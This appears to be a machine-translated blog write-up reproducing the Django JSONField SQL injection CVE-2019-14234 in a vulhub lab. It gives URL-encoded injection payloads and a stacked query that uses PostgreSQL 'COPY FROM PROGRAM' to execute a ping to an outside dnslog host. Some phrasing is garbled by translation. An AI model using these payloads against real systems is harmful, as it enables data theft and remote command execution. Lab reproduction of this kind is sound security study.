Shulou(Shulou.com)05/31 Report--

Django JSONField SQL injection vulnerability CVE-2019-14234 recurrence is what, many novices are not very clear about this, in order to help you solve this problem, the following small series will explain in detail for everyone, there are people who need this can learn, I hope you can gain something.

Django is an open source web application framework written in Python. MTV's frame mode is adopted, i.e. model M, view V and template T. It was originally developed as CMS software to manage news content based websites owned by Lawrence Publishing Group. It was released under the BSD license in July 2005.

The vulnerability requires developers to use JSONField/HStoreField, and the user can control the key name of the queryset query, and inject SQL statements at the position of the key name. Django is usually paired with a postgresql database, and JSONField is a data type for that database. The vulnerability is due to the implementation of the JSONField class in Django. The most essential role of Django's model is to generate SQL statements. When Django generates SQL statements through JSONFields, it is through simple string concatenation.

Vulnerability Impact Version:

Django main development branch

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

It is only used for vulnerability reproduction recording and implementation. The utilization process is as follows:

I. Vulnerable environment

This environment is built using vulhub

Execute the following command to complete the environment setup

cd vulhub/django/CVE-2019-14234/docker-compose up -d

After startup, the message is as follows

Vulnerability link: 192.168.101.152:8000/

Access as shown below

First visit http://192.168.101.152:8000/admin/login background, account password admin/a123123123

II. Use process

After logging in to the background, first visit the model Collection management page

http://192.168.101.152:8000/admin/vuln/collection/

Adding the get parameter detail__a'triggers an sql statement error, where detail is the JSONField of the model Collection

http://192.168.101.152:8000/admin/vuln/collection/? detail__a%27

construction statements

http://192.168.101.152:8000/admin/vuln/collection/? detail__a%27)%3D%271%27%20or%201%3d1%20--

Since or 1=1 is always true, return all results

Django is commonly used with PostgreSQL, which allows for an attempt to exploit a PostgreSQL high-privilege command execution vulnerability (CVE-2019-9193).

paid his first state visit

http://192.168.101.152:8000/admin/vuln/collection/? detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20

Show no results to fetch, the statement has been executed

accessed after

http://192.168.101.152:8000/admin/vuln/collection/? detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20h7f2ni.dnslog.cn%20%27--%20

execution command

As you can see, the command has been successfully executed.

Did reading the above help you? If you still want to have further understanding of related knowledge or read more related articles, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.